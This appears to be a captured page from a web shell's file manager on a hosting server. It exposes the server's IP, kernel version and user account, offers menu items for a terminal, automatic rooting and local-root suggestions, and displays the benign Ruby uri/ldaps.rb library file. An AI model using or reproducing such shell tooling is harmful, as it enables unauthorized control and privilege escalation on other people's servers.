Linux premium82.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
LiteSpeed
Server IP : 185.61.154.194 & Your IP : 216.73.216.196
Domains :
Cant Read [ /etc/named.conf ]
User : evicodqw
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby34 /
share /
ruby /
uri /
Delete
Unzip
Name
Size
Permission
Date
Action
common.rb
26.31
KB
-rw-r--r--
2025-05-29 13:39
file.rb
2.24
KB
-rw-r--r--
2025-05-29 13:39
ftp.rb
7.04
KB
-rw-r--r--
2025-05-29 13:39
generic.rb
37.05
KB
-rw-r--r--
2025-05-29 13:39
http.rb
3.62
KB
-rw-r--r--
2025-05-29 13:39
https.rb
558
B
-rw-r--r--
2025-05-29 13:39
ldap.rb
5.78
KB
-rw-r--r--
2025-05-29 13:39
ldaps.rb
511
B
-rw-r--r--
2025-05-29 13:39
mailto.rb
7.83
KB
-rw-r--r--
2025-05-29 13:39
rfc2396_parser.rb
17.29
KB
-rw-r--r--
2025-05-29 13:39
rfc3986_parser.rb
6.01
KB
-rw-r--r--
2025-05-29 13:39
version.rb
150
B
-rw-r--r--
2025-05-29 13:39
ws.rb
2.24
KB
-rw-r--r--
2025-05-29 13:39
wss.rb
531
B
-rw-r--r--
2025-05-29 13:39
Save
Rename
# frozen_string_literal: false # = uri/ldap.rb # # License:: You can redistribute it and/or modify it under the same term as Ruby. # # See URI for general documentation # require_relative 'ldap' module URI # The default port for LDAPS URIs is 636, and the scheme is 'ldaps:' rather # than 'ldap:'. Other than that, LDAPS URIs are identical to LDAP URIs; # see URI::LDAP. class LDAPS < LDAP # A Default port of 636 for URI::LDAPS DEFAULT_PORT = 636 end register_scheme 'LDAPS', LDAPS end